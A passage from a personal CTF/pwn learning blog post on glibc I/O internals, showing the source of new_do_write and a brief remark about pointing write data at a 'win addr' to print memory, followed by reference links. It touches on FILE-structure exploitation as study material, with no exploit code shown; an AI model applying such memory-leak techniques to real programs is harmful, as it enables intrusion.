<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">static</span><br>_IO_size_t<br><span class="hljs-title function_">new_do_write</span> <span class="hljs-params">(_IO_FILE *fp, <span class="hljs-type">const</span> <span class="hljs-type">char</span> *data, _IO_size_t to_do)</span><br>&#123;<br>  _IO_size_t count;<br>  ...<br>  <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (fp-&gt;_IO_read_end != fp-&gt;_IO_write_base)<br>    &#123;<br>      _IO_off64_t new_pos<br>  = _IO_SYSSEEK (fp, fp-&gt;_IO_write_base - fp-&gt;_IO_read_end, <span class="hljs-number">1</span>);<br>      <span class="hljs-keyword">if</span> (new_pos == _IO_pos_BAD)<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>      fp-&gt;_offset = new_pos;<br>    &#125;<br>  count = _IO_SYSWRITE (fp, data, to_do);<br>  ...<br>  _IO_setg (fp, fp-&gt;_IO_buf_base, fp-&gt;_IO_buf_base, fp-&gt;_IO_buf_base);<br>  fp-&gt;_IO_write_base = fp-&gt;_IO_write_ptr = fp-&gt;_IO_buf_base;<br>  fp-&gt;_IO_write_end = (fp-&gt;_mode &lt;= <span class="hljs-number">0</span><br>           &amp;&amp; (fp-&gt;_flags &amp; (_IO_LINE_BUF | _IO_UNBUFFERED))<br>           ? fp-&gt;_IO_buf_base : fp-&gt;_IO_buf_end);<br>  <span class="hljs-keyword">return</span> count;<br>&#125;<br></code></pre></td></tr></table></figure>

<pre><code>At count = _IO_SYSWRITE (fp, data, to_do); here we see data was our win addr and fileno: 0x1, This time we will put on our screen
</code></pre>
<p>That is soooooooo beautiful.</p>
<h1 id="FINALLY"><a href="#FINALLY" class="headerlink" title="FINALLY"></a>FINALLY</h1><pre><code>Hi bro if you see here, wooooowwww, you made it. And i also made it. I really like pwn and i trust myself to be a pwn master

HI IF YOU LIKE THIS ARTICLE. GIVE ME A STAR!!! THANK YOU~~ SEE YOU NEXT TIME!!!
</code></pre>
<h1 id="LINK"><a href="#LINK" class="headerlink" title="LINK"></a><font style="color:rgba(0, 0, 0, 0.85);">LINK</font></h1><p><a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/ctf/iofile.html">https://wiki.wgpsec.org/knowledge/ctf/iofile.html</a></p>
<p><a target="_blank" rel="noopener" href="https://elixir.bootlin.com/glibc/glibc-2.35/source/libio">https://elixir.bootlin.com/glibc/glibc-2.35/source/libio</a></p>
<p><a target="_blank" rel="noopener" href="https://ciphersaw.me/ctf-wiki/pwn/linux/io_file/introduction/">https://ciphersaw.me/ctf-wiki/pwn/linux/io_file&#x2F;introduction&#x2F;</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cubeyond.net/">https://www.cubeyond.net/</a></p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-end"><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2025/12/26/hello-world/">Hello World Prev →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" onClick="tocControl.change()" title="To Catalog"><span class="tocBtnIconBar"></span><span class="tocBtnIconBar"></span><span class="tocBtnIconBar"></span></a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo" style="margin:0;border-radius:0;"></a><h1 id="Dr"><a href="/">H1m</a></h1><div id="description"><p>house of H1m</p></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#I-O-Learning-%E2%80%93the-func-fread"><span class="toc-number">1.</span> <span class="toc-text">I&#x2F;O Learning –the func fread</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#PART1"><span class="toc-number">1.1.</span> <span class="toc-text">PART1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PART2"><span class="toc-number">1.2.</span> <span class="toc-text">PART2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#WHAT-AI-SAID"><span class="toc-number">1.2.1.</span> <span class="toc-text">WHAT AI SAID</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#REALLY-CHECK"><span class="toc-number">1.2.2.</span> <span class="toc-text">REALLY CHECK</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#STAGE1"><span class="toc-number">1.2.2.1.</span> <span class="toc-text">STAGE1	</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#STAGE2"><span class="toc-number">1.2.2.2.</span> <span class="toc-text">STAGE2</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#STAGE3"><span class="toc-number">1.2.2.3.</span> <span class="toc-text">STAGE3</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PART3"><span class="toc-number">1.3.</span> <span class="toc-text">PART3 </span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#I-O-Learning-%E2%80%93the-func-fwrite"><span class="toc-number">2.</span> <span class="toc-text">I&#x2F;O Learning –the func fwrite</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#PART1-1"><span class="toc-number">2.1.</span> <span class="toc-text">PART1</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#STAGE1-1"><span class="toc-number">2.1.1.</span> <span class="toc-text">STAGE1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#STAGE2-1"><span class="toc-number">2.1.2.</span> <span class="toc-text">STAGE2</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PART2-1"><span class="toc-number">2.2.</span> <span class="toc-text">PART2</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#FINALLY"><span class="toc-number">3.</span> <span class="toc-text">FINALLY</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#LINK"><span class="toc-number">4.</span> <span class="toc-text">LINK</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>